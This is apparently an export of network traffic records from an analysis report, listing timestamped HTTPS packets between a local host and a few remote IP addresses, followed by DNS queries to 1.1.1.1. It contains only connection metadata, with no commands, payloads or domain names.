                            Aug 13, 2024 21:58:08.954400063 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.954438925 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.954482079 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.954554081 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.954588890 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.954602003 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.954607964 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.954628944 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.954646111 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.954684973 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.954732895 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.955135107 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.955199003 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.955203056 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.955209970 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.955260992 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.955333948 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.955410957 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.955424070 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.955496073 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.956476927 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.956589937 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.956624031 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.956684113 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.956742048 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.956749916 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.956763029 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.956813097 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.046812057 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.046911001 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.046952963 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.047019005 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.047077894 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.047178984 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.047194958 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.047228098 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.047244072 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.047270060 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.047508001 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.047573090 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.048660994 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.048707008 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.048743010 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.048744917 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.048764944 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.048793077 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.048808098 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.048839092 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.048868895 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.048870087 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.048870087 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.048878908 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.048902988 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.048917055 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.048917055 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.048928022 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.049019098 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.049045086 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.049118996 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.049241066 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.049280882 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.049313068 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.049324036 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.049340963 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.049350977 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.049459934 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.049467087 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.049530983 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.056807041 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.139413118 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.139456987 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.139496088 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.139516115 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.139529943 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.139988899 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.140048027 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.140053988 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.140094042 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.140103102 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.140152931 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.140224934 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.140270948 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.140289068 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.140336990 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.140377045 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.140422106 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.140521049 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.140568972 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.140626907 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.140674114 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.140705109 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.140750885 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.140974045 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.141016006 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.141042948 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.141048908 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.141058922 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.141910076 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.141927004 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.141972065 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.141977072 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.142014027 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.144676924 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.144694090 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.144752026 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.144758940 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.145030022 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.145059109 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.145082951 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.145088911 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.145117998 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.145401001 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.145421028 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.145457029 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.145462036 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.145498037 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.145555973 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.145606995 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.145611048 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.194001913 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.222269058 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.222325087 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.222357035 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.222383022 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.222421885 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.232166052 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.232213974 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.232239008 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.232254982 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.232266903 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.232290983 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.232310057 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.232465982 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.232528925 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.233043909 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.233059883 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.233127117 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.233136892 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.233150005 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.233175993 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.233182907 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.233206034 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.233560085 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.233580112 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.233633995 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.233639002 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.233696938 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.233705997 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.233716011 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.233720064 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.233762980 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.234009981 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.234041929 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.234066010 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.234071970 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.234095097 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.234111071 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.234162092 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.234167099 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.234206915 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.234208107 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:09.234247923 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.235342979 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.263644934 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:09.263695002 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:10.319896936 CEST59196443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:10.319933891 CEST44359196188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:10.324021101 CEST59196443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:10.324738979 CEST59196443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:10.324755907 CEST44359196188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:10.794493914 CEST44359196188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:10.801238060 CEST59196443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:10.801259995 CEST44359196188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:10.802366018 CEST44359196188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:10.803230047 CEST59196443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:10.803402901 CEST44359196188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:10.805370092 CEST59196443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:10.852498055 CEST44359196188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:11.119844913 CEST44359196188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:11.119973898 CEST44359196188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:11.120024920 CEST59196443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:11.120054007 CEST44359196188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:11.120137930 CEST44359196188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:11.120182991 CEST59196443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:11.120188951 CEST44359196188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:11.120286942 CEST44359196188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:11.120332956 CEST59196443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:11.120337963 CEST44359196188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:11.120511055 CEST44359196188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:11.120563984 CEST59196443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:11.267205954 CEST59196443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:11.267231941 CEST44359196188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:14.826641083 CEST59197443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:14.826677084 CEST4435919740.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:14.826762915 CEST59197443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:14.827502012 CEST59197443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:14.827516079 CEST4435919740.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:15.671411991 CEST4435919740.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:15.671509981 CEST59197443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:15.673455000 CEST59197443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:15.673464060 CEST4435919740.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:15.674314022 CEST4435919740.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:15.676089048 CEST59197443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:15.676203012 CEST59197443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:15.676208019 CEST4435919740.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:15.676423073 CEST59197443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:15.716499090 CEST4435919740.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:15.860707998 CEST4435919740.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:15.860799074 CEST4435919740.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:15.860856056 CEST59197443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:15.861028910 CEST59197443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:15.861042976 CEST4435919740.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:32.289509058 CEST59200443192.168.2.6142.250.185.132
                            Aug 13, 2024 21:58:32.289552927 CEST44359200142.250.185.132192.168.2.6
                            Aug 13, 2024 21:58:32.289752960 CEST59200443192.168.2.6142.250.185.132
                            Aug 13, 2024 21:58:32.291203976 CEST59200443192.168.2.6142.250.185.132
                            Aug 13, 2024 21:58:32.291219950 CEST44359200142.250.185.132192.168.2.6
                            Aug 13, 2024 21:58:33.554759026 CEST44359200142.250.185.132192.168.2.6
                            Aug 13, 2024 21:58:33.555074930 CEST59200443192.168.2.6142.250.185.132
                            Aug 13, 2024 21:58:33.555082083 CEST44359200142.250.185.132192.168.2.6
                            Aug 13, 2024 21:58:33.555393934 CEST44359200142.250.185.132192.168.2.6
                            Aug 13, 2024 21:58:33.555835009 CEST59200443192.168.2.6142.250.185.132
                            Aug 13, 2024 21:58:33.555881023 CEST44359200142.250.185.132192.168.2.6
                            Aug 13, 2024 21:58:33.599091053 CEST59200443192.168.2.6142.250.185.132
                            Aug 13, 2024 21:58:37.710643053 CEST59201443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:37.710684061 CEST4435920135.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:37.710786104 CEST59201443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:37.711324930 CEST59201443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:37.711349010 CEST4435920135.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.173394918 CEST4435920135.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.173758030 CEST59201443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:38.173774958 CEST4435920135.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.174252033 CEST4435920135.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.174771070 CEST59201443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:38.174851894 CEST4435920135.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.174993992 CEST59201443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:38.216526031 CEST4435920135.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.300281048 CEST4435920135.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.300620079 CEST59201443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:38.300726891 CEST4435920135.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.300800085 CEST59201443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:38.301136017 CEST59202443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:38.301186085 CEST4435920235.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.301253080 CEST59202443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:38.301466942 CEST59202443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:38.301481962 CEST4435920235.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.847852945 CEST4435920235.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.848244905 CEST59202443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:38.848262072 CEST4435920235.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.852097988 CEST4435920235.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.852170944 CEST59202443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:38.852971077 CEST59202443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:38.853137970 CEST4435920235.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.853144884 CEST59202443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:38.896477938 CEST59202443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:38.896496058 CEST4435920235.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.943708897 CEST59202443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:38.979965925 CEST4435920235.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.980398893 CEST4435920235.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.980515003 CEST59202443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:38.980588913 CEST59202443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:38.980588913 CEST59202443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:38.980607986 CEST4435920235.190.80.1192.168.2.6
                            Aug 13, 2024 21:58:38.980844021 CEST59202443192.168.2.635.190.80.1
                            Aug 13, 2024 21:58:40.337131023 CEST59203443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:40.337165117 CEST4435920340.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:40.337835073 CEST59203443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:40.338550091 CEST59203443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:40.338563919 CEST4435920340.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:41.142839909 CEST4435920340.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:41.142934084 CEST59203443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:41.144691944 CEST59203443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:41.144701958 CEST4435920340.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:41.144946098 CEST4435920340.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:41.149316072 CEST59203443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:41.149394989 CEST59203443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:41.149399996 CEST4435920340.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:41.149543047 CEST59203443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:41.196497917 CEST4435920340.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:41.338126898 CEST4435920340.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:41.338759899 CEST4435920340.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:41.338829994 CEST59203443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:41.500633955 CEST59203443192.168.2.640.115.3.253
                            Aug 13, 2024 21:58:41.500658035 CEST4435920340.115.3.253192.168.2.6
                            Aug 13, 2024 21:58:42.845475912 CEST44359200142.250.185.132192.168.2.6
                            Aug 13, 2024 21:58:42.845537901 CEST44359200142.250.185.132192.168.2.6
                            Aug 13, 2024 21:58:42.845668077 CEST59200443192.168.2.6142.250.185.132
                            Aug 13, 2024 21:58:44.149169922 CEST59200443192.168.2.6142.250.185.132
                            Aug 13, 2024 21:58:44.149192095 CEST44359200142.250.185.132192.168.2.6
                            TimestampSource PortDest PortSource IPDest IP
                            Aug 13, 2024 21:57:27.755806923 CEST53528751.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:27.878881931 CEST53534781.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:29.080761909 CEST53619181.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:29.506756067 CEST5284453192.168.2.61.1.1.1
                            Aug 13, 2024 21:57:29.506973982 CEST5485453192.168.2.61.1.1.1
                            Aug 13, 2024 21:57:29.517474890 CEST53548541.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:29.518645048 CEST53528441.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:30.208962917 CEST5441953192.168.2.61.1.1.1
                            Aug 13, 2024 21:57:30.209192038 CEST5593453192.168.2.61.1.1.1
                            Aug 13, 2024 21:57:30.220109940 CEST53544191.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:30.220979929 CEST53559341.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:31.635320902 CEST6147353192.168.2.61.1.1.1
                            Aug 13, 2024 21:57:31.635776997 CEST5428053192.168.2.61.1.1.1
                            Aug 13, 2024 21:57:31.648555994 CEST53614731.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:31.692636013 CEST53542801.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:32.275470018 CEST6130853192.168.2.61.1.1.1
                            Aug 13, 2024 21:57:32.275768042 CEST5532553192.168.2.61.1.1.1
                            Aug 13, 2024 21:57:32.282740116 CEST53613081.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:32.282776117 CEST53553251.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:32.989198923 CEST6001653192.168.2.61.1.1.1
                            Aug 13, 2024 21:57:32.989434004 CEST6023553192.168.2.61.1.1.1
                            Aug 13, 2024 21:57:32.996042967 CEST53600161.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:32.996893883 CEST53602351.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:35.125333071 CEST5466953192.168.2.61.1.1.1
                            Aug 13, 2024 21:57:35.125817060 CEST5840053192.168.2.61.1.1.1
                            Aug 13, 2024 21:57:35.132421017 CEST53546691.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:35.132817030 CEST53584001.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:35.302865982 CEST5230053192.168.2.61.1.1.1
                            Aug 13, 2024 21:57:35.303524971 CEST4928553192.168.2.61.1.1.1
                            Aug 13, 2024 21:57:35.310874939 CEST53523001.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:35.311130047 CEST53492851.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:37.706919909 CEST6236353192.168.2.61.1.1.1
                            Aug 13, 2024 21:57:37.707144976 CEST4975953192.168.2.61.1.1.1
                            Aug 13, 2024 21:57:37.717076063 CEST53497591.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:37.717137098 CEST53623631.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:44.714968920 CEST53587981.1.1.1192.168.2.6
                            Aug 13, 2024 21:57:46.306104898 CEST53567651.1.1.1192.168.2.6
                            Aug 13, 2024 21:58:01.134262085 CEST4986553192.168.2.61.1.1.1
                            Aug 13, 2024 21:58:01.135219097 CEST5941753192.168.2.61.1.1.1
                            Aug 13, 2024 21:58:01.142019033 CEST53498651.1.1.1192.168.2.6
                            Aug 13, 2024 21:58:01.142462969 CEST53594171.1.1.1192.168.2.6
                            Aug 13, 2024 21:58:01.925370932 CEST5507253192.168.2.61.1.1.1
                            Aug 13, 2024 21:58:01.925730944 CEST6047953192.168.2.61.1.1.1
                            Aug 13, 2024 21:58:01.933397055 CEST53550721.1.1.1192.168.2.6
                            Aug 13, 2024 21:58:01.934376001 CEST53604791.1.1.1192.168.2.6
                            Aug 13, 2024 21:58:02.137638092 CEST5612753192.168.2.61.1.1.1
                            Aug 13, 2024 21:58:02.137804031 CEST6531053192.168.2.61.1.1.1
                            Aug 13, 2024 21:58:02.226857901 CEST53561271.1.1.1192.168.2.6
                            Aug 13, 2024 21:58:02.235527039 CEST53653101.1.1.1192.168.2.6
                            Aug 13, 2024 21:58:05.098953009 CEST5236653192.168.2.61.1.1.1
                            Aug 13, 2024 21:58:05.099153996 CEST5166353192.168.2.61.1.1.1
                            Aug 13, 2024 21:58:05.215936899 CEST6162653192.168.2.61.1.1.1
                            Aug 13, 2024 21:58:05.216104984 CEST4975553192.168.2.61.1.1.1
                            Aug 13, 2024 21:58:05.221055984 CEST53523661.1.1.1192.168.2.6
                            Aug 13, 2024 21:58:05.223448038 CEST53616261.1.1.1192.168.2.6
                            Aug 13, 2024 21:58:05.224103928 CEST53497551.1.1.1192.168.2.6
                            Aug 13, 2024 21:58:05.294689894 CEST53516631.1.1.1192.168.2.6
                            Aug 13, 2024 21:58:05.421669960 CEST53540841.1.1.1192.168.2.6
                            Aug 13, 2024 21:58:06.859381914 CEST6122753192.168.2.61.1.1.1
                            Aug 13, 2024 21:58:06.859692097 CEST5050253192.168.2.61.1.1.1
                            Aug 13, 2024 21:58:06.866338968 CEST53505021.1.1.1192.168.2.6
